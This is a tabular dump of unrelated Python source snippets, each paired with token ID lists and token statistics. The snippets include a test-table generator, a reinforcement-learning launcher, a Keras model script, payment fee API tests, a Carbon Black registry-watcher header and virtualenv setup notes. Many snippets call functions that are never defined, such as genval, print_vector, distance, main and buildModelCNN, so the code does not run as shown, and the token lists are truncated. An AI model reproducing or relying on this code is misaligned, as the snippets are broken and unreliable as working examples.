content
stringlengths
1
1.05M
input_ids
listlengths
1
883k
ratio_char_token
float64
1
22.9
token_count
int64
1
883k
#!/usr/bin/env python3 import random N = 32 M = 64 # NOTE: 0 is a reserved value randu = lambda x: random.randint(1, 2**x-1) randU32 = lambda: randu(32) randU64 = lambda: randu(64) fmt_by_dtype = { 'u32hex': '0x{:08x}', 'u64hex': '0x{:016x}', } cpp_by_dtype = { 'u32hex': 'uint32_t', 'u64hex': 'uint64_t', } # key = randU32() # vals = [(key, randU32(), randU64()) for _ in range(N)] # keys = [(x[0], x[1]) for x in vals] # success = [random.choice(vals) for _ in range(M)] # failure = [] keys = [(randU32(),) for _ in range(M)] vals = [(randU32(), randU64()) for _ in range(N)] miss = [(genval(),) for _ in range(M)] print('TEST_CASE("Insert random values and look them up", "[gentbl]")') print('{') print_vector(keys, name='keys', dtypes=['u32hex'], indent=4) print() print_vector(vals, name='vals', dtypes=['u32hex', 'u64hex'], indent=4) print() print_vector(miss, name='miss', dtypes=['u32hex'], indent=4) print() print('}') # print("const std::vector<std::tuple<uint32_t, uint32_t, uint64_t>> vs = {") # for _ in range(N): # print(" {{ 0x{:08x}, 0x{:08x}, 0x{:016x} }},".format( # randU32(), randU32(), randU64())) # print("};")
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 628, 198, 11748, 4738, 628, 198, 45, 796, 3933, 198, 44, 796, 5598, 198, 2, 24550, 25, 657, 318, 257, 10395, 1988, 198, 25192, 84, 220, 220, 796, 37456, 2124, 25, 4738, 13, 25192, 6...
2.245714
525
"""Toy environment launcher. See the docs for more details about this environment. """ import sys import logging import numpy as np from deer.default_parser import process_args from deer.agent import NeuralAgent from deer.learning_algos.q_net_keras import MyQNetwork from Toy_env import MyEnv as Toy_env import deer.experiment.base_controllers as bc from deer.policies import EpsilonGreedyPolicy if __name__ == "__main__": logging.basicConfig(level=logging.INFO) # --- Parse parameters --- parameters = process_args(sys.argv[1:], Defaults) if parameters.deterministic: rng = np.random.RandomState(123456) else: rng = np.random.RandomState() # --- Instantiate environment --- env = Toy_env(rng) # --- Instantiate qnetwork --- qnetwork = MyQNetwork( env, parameters.rms_decay, parameters.rms_epsilon, parameters.momentum, parameters.clip_norm, parameters.freeze_interval, parameters.batch_size, parameters.update_rule, rng) train_policy = EpsilonGreedyPolicy(qnetwork, env.nActions(), rng, 0.1) test_policy = EpsilonGreedyPolicy(qnetwork, env.nActions(), rng, 0.) # --- Instantiate agent --- agent = NeuralAgent( env, qnetwork, parameters.replay_memory_size, max(env.inputDimensions()[i][0] for i in range(len(env.inputDimensions()))), parameters.batch_size, rng, train_policy=train_policy, test_policy=test_policy) # --- Bind controllers to the agent --- # Before every training epoch (periodicity=1), we want to print a summary of the agent's epsilon, discount and # learning rate as well as the training epoch number. agent.attach(bc.VerboseController( evaluate_on='epoch', periodicity=1)) # During training epochs, we want to train the agent after every [parameters.update_frequency] action it takes. # Plus, we also want to display after each training episode (!= than after every training) the average bellman # residual and the average of the V values obtained during the last episode, hence the two last arguments. agent.attach(bc.TrainerController( evaluate_on='action', periodicity=parameters.update_frequency, show_episode_avg_V_value=True, show_avg_Bellman_residual=True)) # Every epoch end, one has the possibility to modify the learning rate using a LearningRateController. Here we # wish to update the learning rate after every training epoch (periodicity=1), according to the parameters given. agent.attach(bc.LearningRateController( initial_learning_rate=parameters.learning_rate, learning_rate_decay=parameters.learning_rate_decay, periodicity=1)) # Same for the discount factor. agent.attach(bc.DiscountFactorController( initial_discount_factor=parameters.discount, discount_factor_growth=parameters.discount_inc, discount_factor_max=parameters.discount_max, periodicity=1)) # As for the discount factor and the learning rate, one can update periodically the parameter of the epsilon-greedy # policy implemented by the agent. This controllers has a bit more capabilities, as it allows one to choose more # precisely when to update epsilon: after every X action, episode or epoch. This parameter can also be reset every # episode or epoch (or never, hence the resetEvery='none'). agent.attach(bc.EpsilonController( initial_e=parameters.epsilon_start, e_decays=parameters.epsilon_decay, e_min=parameters.epsilon_min, evaluate_on='action', periodicity=1, reset_every='none')) # All previous controllers control the agent during the epochs it goes through. However, we want to interleave a # "test epoch" between each training epoch ("one of two epochs", hence the periodicity=2). We do not want these # test epoch to interfere with the training of the agent, which is well established by the TrainerController, # EpsilonController and alike. Therefore, we will disable these controllers for the whole duration of the test # epochs interleaved this way, using the controllersToDisable argument of the InterleavedTestEpochController. # The value of this argument is a list of the indexes of all controllers to disable, their index reflecting in # which order they were added. Here, "0" is refering to the firstly attached controller, thus the # VerboseController; "2" refers to the thirdly attached controller, thus the LearningRateController; etc. The order # in which the indexes are listed is not important. # For each test epoch, we want also to display the sum of all rewards obtained, hence the showScore=True. # Finally, we want to call the summarizePerformance method of Toy_Env every [parameters.period_btw_summary_perfs] # *test* epochs. agent.attach(bc.InterleavedTestEpochController( id=0, epoch_length=parameters.steps_per_test, periodicity=1, show_score=True, summarize_every=parameters.period_btw_summary_perfs)) # --- Run the experiment --- agent.run(parameters.epochs, parameters.steps_per_epoch)
[ 37811, 48236, 2858, 24008, 13, 4091, 262, 34165, 329, 517, 3307, 546, 428, 2858, 13, 198, 198, 37811, 198, 198, 11748, 25064, 198, 11748, 18931, 198, 11748, 299, 32152, 355, 45941, 198, 198, 6738, 20096, 13, 12286, 62, 48610, 1330, 1429...
2.908593
1,827
# ------------------------------------------------------------------ # # RDF and CN related analysis # # ------------------------------------------------------------------ import sys py_path = '../../../../postprocessing/' sys.path.insert(0, py_path) py_path = '../../../../postprocessing/io_operations/' sys.path.insert(0, py_path) import cn_and_rdf_lmp as crl import io_module as io # # Input # # RDF and CN intput file rdf_file = '../nafion.rdf' # Output file out_file = 'rdf_cn_averaged.txt' # Number of bins nbins = 300 # Number of columns ncols = 10 crl.compute_time_average(rdf_file, out_file, nbins, ncols)
[ 2, 16529, 438, 198, 2, 198, 2, 197, 49, 8068, 290, 31171, 3519, 3781, 197, 198, 2, 198, 2, 16529, 438, 198, 198, 11748, 25064, 198, 9078, 62, 6978, 796, 705, 40720, 40720, 40720, 40720, 7353, 36948, 14, 6, 198, 17597, 13, 6978, 13...
2.911628
215
from ..doctools import document from .geom import geom from .geom_path import geom_path from .geom_point import geom_point from .geom_linerange import geom_linerange
[ 6738, 11485, 4598, 310, 10141, 1330, 3188, 198, 6738, 764, 469, 296, 1330, 4903, 296, 198, 6738, 764, 469, 296, 62, 6978, 1330, 4903, 296, 62, 6978, 198, 6738, 764, 469, 296, 62, 4122, 1330, 4903, 296, 62, 4122, 198, 6738, 764, 469,...
3.092593
54
#!/usr/bin/python # -*- coding: utf-8 -*- __author__ = 'ar' import json import os import skimage.io as skio import matplotlib.pyplot as plt import numpy as np import keras from keras.models import Model from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense from keras.utils.visualize_util import plot as kplot ################################## ################################## ################################## if __name__ == '__main__': model = buildModelCNN(inpShape=(3, 128, 128)) fimgModel = 'keras-model-cnn.jpg' kplot(model, fimgModel, show_shapes=True) # plt.imshow(skio.imread(fimgModel)) # plt.show() model.summary() print ('------') numLayers = len(model.layers) for ii,ll in enumerate(model.layers): print ('[%d/%d] : %s' % (ii, numLayers, ll)) modelJson = generateModelJsonDict(model) print ('----------------------') print (json.dumps(modelJson, indent=4)) foutJson = 'test-model-cnn.json' with open(foutJson, 'w') as f: json.dump(modelJson, f, indent=4) # print (json.dumps(modelJson, indent=4))
[ 2, 48443, 14629, 14, 8800, 14, 29412, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 834, 9800, 834, 796, 705, 283, 6, 198, 198, 11748, 33918, 198, 11748, 28686, 198, 11748, 1341, 9060, 13, 952, 355, 1341, 952...
2.561644
438
""" Test the integrations related to the internal interface implementation and the 'Interface' interface itself """ import pytest from cppython_core.schema import InterfaceConfiguration from pytest_cppython.plugin import InterfaceIntegrationTests from cppython.console import ConsoleInterface
[ 37811, 198, 14402, 262, 4132, 9143, 3519, 284, 262, 5387, 7071, 7822, 290, 262, 705, 39317, 6, 7071, 2346, 198, 37811, 198, 198, 11748, 12972, 9288, 198, 6738, 269, 381, 7535, 62, 7295, 13, 15952, 2611, 1330, 26491, 38149, 198, 6738, ...
4.484848
66
#@contact Sejoon Oh (soh337@gatech.edu), Georgia Institute of Technology #@version 1.0 #@date 2021-08-17 #Influence-guided Data Augmentation for Neural Tensor Completion (DAIN) #This software is free of charge under research purposes. #For commercial purposes, please contact the main author. import torch from torch import nn from torch.utils.data import Dataset, DataLoader import argparse import numpy as np from dataset import TensorDataset import torch.optim as optim from model import MLP import pandas as pd import copy import random from sklearn.model_selection import train_test_split import os if __name__ == "__main__": main()
[ 2, 31, 32057, 220, 220, 220, 1001, 73, 2049, 3966, 357, 568, 71, 31496, 31, 10494, 354, 13, 15532, 828, 7859, 5136, 286, 8987, 198, 2, 31, 9641, 220, 220, 220, 352, 13, 15, 198, 2, 31, 4475, 220, 220, 220, 220, 220, 220, 33448, ...
3.288557
201
# Copyright 2019 Province of British Columbia # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests to assure the fees end-point. Test-Suite to ensure that the /fees endpoint is working as expected. """ import json from datetime import date, timedelta from pay_api.models import CorpType, FeeCode, FeeSchedule, FilingType from pay_api.schemas import utils as schema_utils from pay_api.utils.enums import Role from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header def test_fees_with_corp_type_and_filing_type(session, client, jwt, app): """Assert that the endpoint returns 200.""" token = jwt.create_jwt(get_claims(), token_header) headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'} corp_type = 'XX' filing_type_code = 'XOTANN' factory_fee_schedule_model( factory_filing_type_model('XOTANN', 'TEST'), factory_corp_type_model('XX', 'TEST'), factory_fee_model('XXX', 100)) rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}', headers=headers) assert rv.status_code == 200 assert schema_utils.validate(rv.json, 'fees')[0] def test_fees_with_corp_type_and_filing_type_with_valid_start_date(session, client, jwt, app): """Assert that the endpoint returns 200.""" # Insert a record first and then query for it token = jwt.create_jwt(get_claims(), token_header) headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'} corp_type = 'XX' filing_type_code = 'XOTANN' now = date.today() factory_fee_schedule_model( factory_filing_type_model('XOTANN', 'TEST'), factory_corp_type_model('XX', 'TEST'), factory_fee_model('XXX', 100), now - timedelta(1)) rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?valid_date={now}', headers=headers) assert rv.status_code == 200 assert schema_utils.validate(rv.json, 'fees')[0] assert not schema_utils.validate(rv.json, 'problem')[0] def test_fees_with_corp_type_and_filing_type_with_invalid_start_date(session, client, jwt, app): """Assert that the endpoint returns 400.""" # Insert a record first and then query for it token = jwt.create_jwt(get_claims(), token_header) headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'} corp_type = 'XX' filing_type_code = 'XOTANN' now = date.today() factory_fee_schedule_model( factory_filing_type_model('XOTANN', 'TEST'), factory_corp_type_model('XX', 'TEST'), factory_fee_model('XXX', 100), now + timedelta(1)) rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?valid_date={now}', headers=headers) assert rv.status_code == 400 assert schema_utils.validate(rv.json, 'problem')[0] assert not schema_utils.validate(rv.json, 'fees')[0] def test_fees_with_corp_type_and_filing_type_with_valid_end_date(session, client, jwt, app): """Assert that the endpoint returns 200.""" # Insert a record first and then query for it token = jwt.create_jwt(get_claims(), token_header) headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'} corp_type = 'XX' filing_type_code = 'XOTANN' now = date.today() factory_fee_schedule_model( factory_filing_type_model('XOTANN', 'TEST'), factory_corp_type_model('XX', 'TEST'), factory_fee_model('XXX', 100), now - timedelta(1), now) rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?valid_date={now}', headers=headers) assert rv.status_code == 200 assert schema_utils.validate(rv.json, 'fees')[0] def test_fees_with_corp_type_and_filing_type_with_invalid_end_date(session, client, jwt, app): """Assert that the endpoint returns 400.""" # Insert a record first and then query for it token = jwt.create_jwt(get_claims(), token_header) headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'} corp_type = 'XX' filing_type_code = 'XOTANN' now = date.today() factory_fee_schedule_model( factory_filing_type_model('XOTANN', 'TEST'), factory_corp_type_model('XX', 'TEST'), factory_fee_model('XXX', 100), now - timedelta(2), now - timedelta(1)) rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?valid_date={now}', headers=headers) assert rv.status_code == 400 assert schema_utils.validate(rv.json, 'problem')[0] def test_calculate_fees_with_waive_fees(session, client, jwt, app): """Assert that the endpoint returns 201.""" token = jwt.create_jwt(get_claims(role='staff'), token_header) headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'} corp_type = 'XX' filing_type_code = 'XOTANN' factory_fee_schedule_model( factory_filing_type_model('XOTANN', 'TEST'), factory_corp_type_model('XX', 'TEST'), factory_fee_model('XXX', 100)) rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?waiveFees=true', headers=headers) assert rv.status_code == 200 assert schema_utils.validate(rv.json, 'fees')[0] assert rv.json.get('filingFees') == 0 def test_calculate_fees_with_waive_fees_unauthorized(session, client, jwt, app): """Assert that the endpoint returns 201.""" token = jwt.create_jwt(get_claims(), token_header) headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'} corp_type = 'XX' filing_type_code = 'XOTANN' factory_fee_schedule_model( factory_filing_type_model('XOTANN', 'TEST'), factory_corp_type_model('XX', 'TEST'), factory_fee_model('XXX', 100)) rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?waiveFees=true', headers=headers) assert rv.status_code == 200 assert schema_utils.validate(rv.json, 'fees')[0] assert rv.json.get('filingFees') == 100 def test_fees_with_quantity(session, client, jwt, app): """Assert that the endpoint returns 200.""" token = jwt.create_jwt(get_claims(), token_header) headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'} corp_type = 'XX' filing_type_code = 'XOTANN' factory_fee_schedule_model( factory_filing_type_model('XOTANN', 'TEST'), factory_corp_type_model('XX', 'TEST'), factory_fee_model('XXX', 100)) rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?quantity=10', headers=headers) assert rv.status_code == 200 assert schema_utils.validate(rv.json, 'fees')[0] def test_calculate_fees_for_service_fee(session, client, jwt, app): """Assert that the endpoint returns 201.""" token = jwt.create_jwt(get_claims(), token_header) headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'} corp_type = 'XX' filing_type_code = 'XOTANN' service_fee = factory_fee_model('SF01', 1.5) factory_fee_schedule_model( factory_filing_type_model('XOTANN', 'TEST'), factory_corp_type_model('XX', 'TEST'), factory_fee_model('XXX', 100), service_fee=service_fee) rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}', headers=headers) assert rv.status_code == 200 assert schema_utils.validate(rv.json, 'fees')[0] assert rv.json.get('filingFees') == 100 assert rv.json.get('serviceFees') == 1.5 def test_calculate_fees_with_zero_service_fee(session, client, jwt, app): """Assert that service fee is zero if the filing fee is zero.""" token = jwt.create_jwt(get_claims(), token_header) headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'} corp_type = 'XX' filing_type_code = 'XOTANN' factory_fee_schedule_model( factory_filing_type_model('XOTANN', 'TEST'), factory_corp_type_model('XX', 'TEST'), factory_fee_model('XXX', 0)) rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}', headers=headers) assert rv.status_code == 200 assert schema_utils.validate(rv.json, 'fees')[0] assert rv.json.get('filingFees') == 0 assert rv.json.get('serviceFees') == 0 def test_fee_for_account_fee_settings(session, client, jwt, app): """Assert that the endpoint returns 200.""" token = jwt.create_jwt(get_claims(role=Role.SYSTEM.value), token_header) headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'} rv = client.post('/api/v1/accounts', data=json.dumps(get_gov_account_payload()), headers=headers) account_id = rv.json.get('authAccountId') # Create account fee details. token = jwt.create_jwt(get_claims(role=Role.MANAGE_ACCOUNTS.value), token_header) headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'} client.post(f'/api/v1/accounts/{account_id}/fees', data=json.dumps({'accountFees': [ { 'applyFilingFees': False, 'serviceFeeCode': 'TRF02', # 1.0 'product': 'BUSINESS' } ]}), headers=headers) # Get fee for this account. token = jwt.create_jwt(get_claims(role=Role.EDITOR.value), token_header) headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json', 'Account-Id': account_id} rv = client.get('/api/v1/fees/BEN/BCANN', headers=headers) assert rv.status_code == 200 assert schema_utils.validate(rv.json, 'fees')[0] # assert filing fee is not applied and service fee is applied assert rv.json.get('filingFees') == 0 assert rv.json.get('serviceFees') == 1.0 # Now change the settings to apply filing fees and assert token = jwt.create_jwt(get_claims(role=Role.MANAGE_ACCOUNTS.value), token_header) headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'} client.put(f'/api/v1/accounts/{account_id}/fees/BUSINESS', data=json.dumps({ 'applyFilingFees': True, 'serviceFeeCode': 'TRF01', # 1.5 'product': 'BUSINESS' }), headers=headers) # Get fee for this account. token = jwt.create_jwt(get_claims(role=Role.EDITOR.value), token_header) headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json', 'Account-Id': account_id} rv = client.get('/api/v1/fees/BEN/BCANN', headers=headers) assert rv.status_code == 200 assert schema_utils.validate(rv.json, 'fees')[0] # assert filing fee is applied and service fee is applied assert rv.json.get('filingFees') > 0 assert rv.json.get('serviceFees') == 1.5 def factory_filing_type_model( filing_type_code: str, filing_description: str = 'TEST'): """Return the filing type model.""" filing_type = FilingType(code=filing_type_code, description=filing_description) filing_type.save() return filing_type def factory_fee_model( fee_code: str, amount: int): """Return the fee code model.""" fee_code_master = FeeCode(code=fee_code, amount=amount) fee_code_master.save() return fee_code_master def factory_corp_type_model( corp_type_code: str, corp_type_description: str): """Return the corp type model.""" corp_type = CorpType(code=corp_type_code, description=corp_type_description) corp_type.save() return corp_type def factory_fee_schedule_model( filing_type: FilingType, corp_type: CorpType, fee_code: FeeCode, fee_start_date: date = date.today(), fee_end_date: date = None, service_fee: FeeCode = None): """Return the fee schedule model.""" fee_schedule = FeeSchedule(filing_type_code=filing_type.code, corp_type_code=corp_type.code, fee_code=fee_code.code, fee_start_date=fee_start_date, fee_end_date=fee_end_date ) if service_fee: fee_schedule.service_fee_code = service_fee.code fee_schedule.save() return fee_schedule
[ 2, 15069, 220, 13130, 22783, 286, 3517, 9309, 198, 2, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 198, 2, 345, 743, 407, 779, 428, 2393, 2845, 287, 11846, 351, 262, 13789, 13, 198, ...
2.393301
5,314
from datetime import datetime, timedelta import jwt from flask import current_app from app import db from app.user.repository import UserRepository
[ 6738, 4818, 8079, 1330, 4818, 8079, 11, 28805, 12514, 198, 198, 11748, 474, 46569, 198, 6738, 42903, 1330, 1459, 62, 1324, 198, 198, 6738, 598, 1330, 20613, 198, 6738, 598, 13, 7220, 13, 260, 1930, 37765, 1330, 11787, 6207, 13264, 628 ]
3.682927
41
import _init_paths import argparse import random import time import utils import os from collections import defaultdict import numpy as np import csv from progress.bar import IncrementalBar from utils.hash import * if __name__ == '__main__': main()
[ 11748, 4808, 15003, 62, 6978, 82, 198, 11748, 1822, 29572, 198, 11748, 4738, 198, 11748, 640, 198, 11748, 3384, 4487, 198, 11748, 28686, 198, 6738, 17268, 1330, 4277, 11600, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 269, 21370, 198,...
3.350649
77
import math from pprint import pprint import matplotlib.pyplot as plt from scipy.optimize import minimize from frispy import Disc from frispy import Discs from frispy import Model model = Discs.roc mph_to_mps = 0.44704 v = 56 * mph_to_mps rot = -v / model.diameter ceiling = 4 # 4 meter ceiling tunnel_width = 4 # 4 meter wide tunnel bnds = [(-90, 90)] * 3 x0 = [6, -3, 10] res = minimize(distance, x0, method='powell', bounds=bnds, options={'xtol': 1e-8, 'disp': True}) pprint(res) a, nose_up, hyzer = res.x disc = Disc(model, {"vx": math.cos(a * math.pi / 180) * v, "dgamma": rot, "vz": math.sin(a * math.pi / 180) * v, "nose_up": nose_up, "hyzer": hyzer}) result = disc.compute_trajectory(15.0, **{"max_step": .2}) times = result.times t, x, y, z = result.times, result.x, result.y, result.z #plt.plot(x, y) #plt.plot(x, z) #plt.plot(t, x) plt.plot(t, y) plt.plot(t, z) pprint(x[-1] * 3.28084) # feet plt.show()
[ 11748, 10688, 198, 6738, 279, 4798, 1330, 279, 4798, 198, 198, 11748, 2603, 29487, 8019, 13, 9078, 29487, 355, 458, 83, 198, 6738, 629, 541, 88, 13, 40085, 1096, 1330, 17775, 198, 198, 6738, 1216, 8802, 88, 1330, 8444, 198, 6738, 1216...
2.22695
423
# Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from openfermioncirq.variational.ansatzes import SwapNetworkTrotterHubbardAnsatz
[ 2, 220, 220, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 198, 2, 220, 220, 345, 743, 407, 779, 428, 2393, 2845, 287, 11846, 351, 262, 13789, 13, 198, 2, 220, 220, 921, 743, 7330, 257, 4866,...
3.473118
186
import os from Bio import AlignIO, Phylo from Bio.Phylo.TreeConstruction import DistanceCalculator, DistanceTreeConstructor
[ 11748, 28686, 198, 6738, 16024, 1330, 978, 570, 9399, 11, 1380, 2645, 78, 198, 6738, 16024, 13, 2725, 2645, 78, 13, 27660, 36687, 1330, 34600, 9771, 3129, 1352, 11, 34600, 27660, 42316, 273 ]
3.727273
33
#!/usr/bin/env python # #The MIT License (MIT) # # Copyright (c) 2015 Bit9 + Carbon Black # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # # ----------------------------------------------------------------------------- # Extension regmod watcher and grabber # # This script listens to the CB messaging bus for registry modification events, # and when a modification is seen that matches a regular expression from a file # of registry path regular expressions, it goes and grabs the registry value # using CB Live Response. # # You need to make sure rabbitmq is enabled in cb.conf, and you might need to # open a firewall rule for port 5004. You also will need to enable regmod # in the DatastoreBroadcastEventTypes=<values> entry. If anything is changed # here, you'll have to do service cb-enterprise restart. # # TODO: More error handling, more performance improvements # # last updated 2016-01-23 by Ben Johnson bjohnson@bit9.com (dev-support@bit9.com) # import re import Queue import sys from threading import Thread import time import traceback try: from cbapi.legacy.util.cli_helpers import main_helper from cbapi.legacy.util.composite_helpers import MessageSubscriberAndLiveResponseActor import cbapi.legacy.util.sensor_events_pb2 as cpb except ImportError: from cbapi.util.cli_helpers import main_helper from cbapi.util.composite_helpers import MessageSubscriberAndLiveResponseActor import cbapi.util.sensor_events_pb2 as cpb if __name__ == "__main__": ## YOU CAN USE data/autoruns_regexes.txt to test ## required_args =[("-i", "--username", "store", None, "username", "CB messaging username"), ("-p", "--password", "store", None, "password", "CB messaging password"), ("-r", "--regpaths_file", "store", None, "regpaths_file", "File of newline delimited regexes for regpaths")] optional_args = [("-v", "--verbose", "store_true", False, "verbose", "Enable verbose output")] main_helper("Subscribe to message bus events and for each registry modification that matches one of our supplied regexes, go retrieve value.", main, custom_required=required_args, custom_optional=optional_args)
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 2, 198, 2, 464, 17168, 13789, 357, 36393, 8, 198, 2, 198, 2, 15069, 357, 66, 8, 1853, 4722, 24, 1343, 23699, 2619, 198, 2, 198, 2, 2448, 3411, 318, 29376, 7520, 11, 1479, 286, 38...
3.255
1,000
# -*- coding: utf-8 -*- """Exceptions raised by the h application.""" from __future__ import unicode_literals from h.i18n import TranslationString as _ # N.B. This class **only** covers exceptions thrown by API code provided by # the h package. memex code has its own base APIError class.
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 37811, 3109, 11755, 4376, 416, 262, 289, 3586, 526, 15931, 198, 198, 6738, 11593, 37443, 834, 1330, 28000, 1098, 62, 17201, 874, 198, 198, 6738, 289, 13, 72, 1507, ...
3.325843
89
#!/usr/bin/env python # Copyright (c) 2018 Orange and others. # # All rights reserved. This program and the accompanying materials # are made available under the terms of the Apache License, Version 2.0 # which accompanies this distribution, and is available at # http://www.apache.org/licenses/LICENSE-2.0 """ Shaker_ wraps around popular system network testing tools like iperf, iperf3 and netperf (with help of flent). Shaker is able to deploy OpenStack instances and networks in different topologies. Shaker scenario specifies the deployment and list of tests to execute. .. _Shaker: http://pyshaker.readthedocs.io/en/latest/ """ import logging import os import json import scp from functest.core import singlevm from functest.utils import env
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 198, 2, 15069, 357, 66, 8, 2864, 11942, 290, 1854, 13, 198, 2, 198, 2, 1439, 2489, 10395, 13, 770, 1430, 290, 262, 19249, 5696, 198, 2, 389, 925, 1695, 739, 262, 2846, 286, 262, ...
3.561321
212
import torch import functools if torch.__version__.startswith('0'): from .sync_bn.inplace_abn.bn import InPlaceABNSync BatchNorm2d = functools.partial(InPlaceABNSync, activation='none') BatchNorm2d_class = InPlaceABNSync relu_inplace = False else: # BatchNorm2d_class = BatchNorm2d = torch.nn.SyncBatchNorm BatchNorm2d_class = BatchNorm2d = torch.nn.BatchNorm2d relu_inplace = True
[ 11748, 28034, 198, 11748, 1257, 310, 10141, 198, 198, 361, 28034, 13, 834, 9641, 834, 13, 9688, 2032, 342, 10786, 15, 6, 2599, 198, 220, 220, 220, 422, 764, 27261, 62, 9374, 13, 259, 5372, 62, 397, 77, 13, 9374, 1330, 554, 27271, ...
2.440476
168
from django.db import models from ordered_model.models import OrderedModel, OrderedModelBase
[ 6738, 42625, 14208, 13, 9945, 1330, 4981, 198, 6738, 6149, 62, 19849, 13, 27530, 1330, 14230, 1068, 17633, 11, 14230, 1068, 17633, 14881, 628, 628, 628, 628, 628 ]
3.642857
28
import os import sys import numpy as np import pandas as pd def get_columns_percent_dataframe(df: pd.DataFrame, totals_column=None, percent_names=True) -> pd.DataFrame: """ @param totals_column: (default = use sum of columns) @param percent_names: Rename names from 'col' => 'col %' Return a dataframe as a percentage of totals_column if provided, or sum of columns """ percent_df = pd.DataFrame(index=df.index) columns = df.columns if totals_column: totals_series = df[totals_column] columns = columns - [totals_column] else: totals_series = df.sum(axis=1) for col in columns: new_col = col if percent_names: new_col = f"{new_col} %" multiplier = 100.0 # to get percent percent_df[new_col] = multiplier * df[col] / totals_series return percent_df def get_rows_percent_dataframe(df: pd.DataFrame) -> pd.DataFrame: """ Return a dataframe as a percentage of sum of rows """ row_sums = df.sum(axis=0) return df.multiply(100.0) / row_sums def get_total_percent_dataframe(df: pd.DataFrame) -> pd.DataFrame: """ Return a dataframe as a percentage of sum of rows """ total = df.sum(axis=0).sum() return df.multiply(100.0) / total
[ 11748, 28686, 198, 11748, 25064, 198, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 19798, 292, 355, 279, 67, 628, 198, 4299, 651, 62, 28665, 82, 62, 25067, 62, 7890, 14535, 7, 7568, 25, 279, 67, 13, 6601, 19778, 11, 26310, 62, 28...
2.516832
505
from app.db import db # Ignore it if db can't find the row when updating/deleting # Todo: not ignore it, raise some error, remove checkers in view
[ 6738, 598, 13, 9945, 1330, 20613, 628, 198, 2, 41032, 340, 611, 20613, 460, 470, 1064, 262, 5752, 618, 19698, 14, 2934, 293, 889, 198, 2, 309, 24313, 25, 407, 8856, 340, 11, 5298, 617, 4049, 11, 4781, 2198, 364, 287, 1570, 198 ]
3.465116
43
""" How to set up virtual environment pip install virtualenv pip install virtualenvwrapper # export WORKON_HOME=~/Envs source /usr/local/bin/virtualenvwrapper.sh # To activate virtualenv and set up flask 1. mkvirtualenv my-venv ###2. workon my-venv 3. pip install Flask 4. pip freeze 5. # To put all dependencies in a file pip freeze > requirements.txt 6. run.py: entry point of the application 7. relational database management system SQLite, MYSQL, PostgreSQL SQLAlchemy is an Object Relational Mapper (ORM), which means that it connects the objects of an application to tables in a relational database management system. """
